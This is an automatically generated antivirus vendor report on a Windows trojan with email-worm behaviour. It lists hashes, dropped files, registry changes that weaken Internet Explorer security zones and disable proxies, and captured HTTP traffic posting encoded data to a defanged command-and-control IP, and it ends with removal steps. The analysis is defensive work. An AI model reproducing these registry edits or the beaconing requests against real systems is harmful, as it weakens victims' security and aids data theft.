Trojan.Win32.FlyStudio_b14c438e54

by malwarelabrobot on June 24th, 2014 in Malware Descriptions.

HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, VirTool


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour: EmailWorm. Description: Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:208

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)

Registry activity

The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies the IE security-zone settings so that all local web nodes with no dots in their names that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912 c:\WINDOWS\system32\SkinH_EL.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1076750 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 1081344 603664 0 0 d41d8cd98f00b204e9800998ecf8427e
.data 1687552 401322 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 2088960 383528 368640 1.56795 352a9695457ee0ad5ff21f6565a784ad
.vmp0 2473984 2517355 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp0 4993024 49204 0 0 d41d8cd98f00b204e9800998ecf8427e
.vmp1 5046272 3488220 3489792 5.49416 bd74e24f97f5e8629357ae467e146b06

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326
hxxp://221.123.147.73/piaoyh.aspx
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3..


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 221.123.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/
Cache-control: private
2....



POST /piaoyh.aspx HTTP/1.1

Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 12
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=97E121E98E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 32
00280096003A009600E1002800EE003A....



POST /piaoyh.aspx HTTP/1.1

Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 339
54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E1
24E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E
50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68
E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69
E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E
....


The Trojan connects to the servers at the following location(s):



Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %System%\SkinH_EL.dll (88 bytes)
    %System%\esdpf.she (20 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
